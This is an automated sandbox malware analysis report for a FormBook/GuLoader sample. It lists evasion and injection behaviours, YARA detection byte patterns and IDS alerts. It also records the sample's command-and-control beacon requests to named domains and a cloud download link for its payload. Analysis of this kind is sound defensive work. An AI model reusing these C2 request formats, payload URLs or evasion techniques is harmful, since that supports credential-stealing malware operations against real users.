Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 211094.exe

Overview

General Information

Sample Name:211094.exe
Analysis ID:358423
MD5:a2bc516696c51f3afdd8721d6c782360
SHA1:2fa5f1d52a9a80b01972cf840b5a3ffffb6be0a4
SHA256:d86226973ffce253c068344a37b83a3e0460cb5331e0d3f0cde729aa62827761
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 211094.exe (PID: 6984 cmdline: 'C:\Users\user\Desktop\211094.exe' MD5: A2BC516696C51F3AFDD8721D6C782360)
    • 211094.exe (PID: 1872 cmdline: 'C:\Users\user\Desktop\211094.exe' MD5: A2BC516696C51F3AFDD8721D6C782360)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 776 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 6648 cmdline: /c del 'C:\Users\user\Desktop\211094.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 211094.exeReversingLabs: Detection: 22%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: 9.2.explorer.exe.983ea0.0.unpackAvira: Label: TR/Dropper.Gen
      Source: 9.2.explorer.exe.4fc7960.5.unpackAvira: Label: TR/Dropper.Gen

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: 211094.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Uses secure TLS version for HTTPS connectionsShow sources
      Source: unknownHTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49727 version: TLS 1.2
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: explorer.pdbUGP source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.384686029.000000000DC20000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: 211094.exe, 00000004.00000002.404809631.000000001E4C0000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.591474852.0000000004BAF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: 211094.exe, explorer.exe
      Source: Binary string: explorer.pdb source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.384686029.000000000DC20000.00000002.00000001.sdmp

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49751 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49751 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49751 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.98.99.30:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 198.54.117.211:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 198.54.117.211:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 198.54.117.211:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 18.189.205.91:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 18.189.205.91:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 18.189.205.91:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 199.79.62.169:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 199.79.62.169:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 199.79.62.169:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 185.230.60.102:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 185.230.60.102:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 185.230.60.102:80
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=Rufvx1jOsytop1bvq44D8J5BrA1Sf94ZUOtMBwRkz2TXMocihNedTu7uPJah09VVn9/XRzeeTw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.guidedcommercialloan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=e6cahffjztzcamJ4O+DKrhaQB5hRPzkwIvwlBHpDvSFa4AI+euUXko8WJypl60YQUdNY72tcfQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.discbrakepart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.truckrev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=y5UfgZt3axNXxKUKNxQBC2DBWQuEwdDoKwpextWmXL4AH1jfcUOFtuVQVuhxYhhogQppfaQ4MQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.quartiercreole.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=zuFquqmMcvMIVTA8KC8hAytFTzaQhDtWEj5Y6a4mHxGfCyQF/Xb/aYQpFx1LlkGMT0GVZlYKNw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.wissinkadams.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=0E3C5mUHlRauL0/Y7Bp5k7qydJv7c0I2M1waktstgn1SsRqH7XaUeeB0rPzY/gY6TfHCuVFaFw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.shopping-container.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=VoDnAKif46zuoDGUOYPF8CFht3P91IwI50ppSsuc6FjbQwYrNosv2kcASbfxHajA03pQPAi11g==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.azhello.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=M0uFvISRXYRHVkOb0AJBAd7B/InOE9ksckU2zFobX8RttE5IKM9SRPMAdsze42ip49A2WvKiMw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.africabiocity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.nhadat9chu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=2Mu6jGWgIoofF63Ti3l/Zo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCNofoA==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.kfs.ltdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=AbpHtwwPcjqVDvg4bYXWsG8P5KsLAA+yhQvslNw16RaUmuaJNxrIVWhvxUk5BU5rJ318S0XyEg==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.lvlyourlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=Rufvx1jOsytop1bvq44D8J5BrA1Sf94ZUOtMBwRkz2TXMocihNedTu7uPJah09VVn9/XRzeeTw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.guidedcommercialloan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=e6cahffjztzcamJ4O+DKrhaQB5hRPzkwIvwlBHpDvSFa4AI+euUXko8WJypl60YQUdNY72tcfQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.discbrakepart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.truckrev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=y5UfgZt3axNXxKUKNxQBC2DBWQuEwdDoKwpextWmXL4AH1jfcUOFtuVQVuhxYhhogQppfaQ4MQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.quartiercreole.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=zuFquqmMcvMIVTA8KC8hAytFTzaQhDtWEj5Y6a4mHxGfCyQF/Xb/aYQpFx1LlkGMT0GVZlYKNw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.wissinkadams.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=0E3C5mUHlRauL0/Y7Bp5k7qydJv7c0I2M1waktstgn1SsRqH7XaUeeB0rPzY/gY6TfHCuVFaFw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.shopping-container.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=VoDnAKif46zuoDGUOYPF8CFht3P91IwI50ppSsuc6FjbQwYrNosv2kcASbfxHajA03pQPAi11g==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.azhello.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=M0uFvISRXYRHVkOb0AJBAd7B/InOE9ksckU2zFobX8RttE5IKM9SRPMAdsze42ip49A2WvKiMw==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.africabiocity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.nhadat9chu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=2Mu6jGWgIoofF63Ti3l/Zo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCNofoA==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.kfs.ltdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /iae2/?Cb=AbpHtwwPcjqVDvg4bYXWsG8P5KsLAA+yhQvslNw16RaUmuaJNxrIVWhvxUk5BU5rJ318S0XyEg==&uVjH=yVCTVb0XT254cnY HTTP/1.1Host: www.lvlyourlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: doc-0k-78-docs.googleusercontent.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Feb 2021 14:49:41 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000006.00000002.588091491.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: 211094.exeString found in binary or memory: https://drive.google.com/uc?export=download&id=1wx8v1bksmyfmjfmnDtrZxoKIzOnkTyrU
      Source: explorer.exe, 00000009.00000002.592642796.0000000005142000.00000004.00000001.sdmpString found in binary or memory: https://www.kfs.ltd/iae2?Cb=2Mu6jGWgIoofF63Ti3l%2FZo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCN
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownHTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49727 version: TLS 1.2

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.587887659.0000000000983000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.592534520.0000000004FC7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02295C7C NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022904A2 EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02292D2E NtSetInformationThread,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02296167 NtSetInformationThread,NtWriteVirtualMemory,NtResumeThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291627 NtSetInformationThread,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_0229261A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02294E54 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_0229228C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022962EF NtResumeThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022962F2 NtResumeThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022922F5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022926D9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022927BD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022927DC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02293C21 NtSetInformationThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02292831 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02296405 NtResumeThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02292455 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022924A9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022904AB EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_0229288F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022928ED NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_0229213D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02290500 NtSetInformationThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02290504 NtSetInformationThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_0229256D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_0229056D NtSetInformationThread,
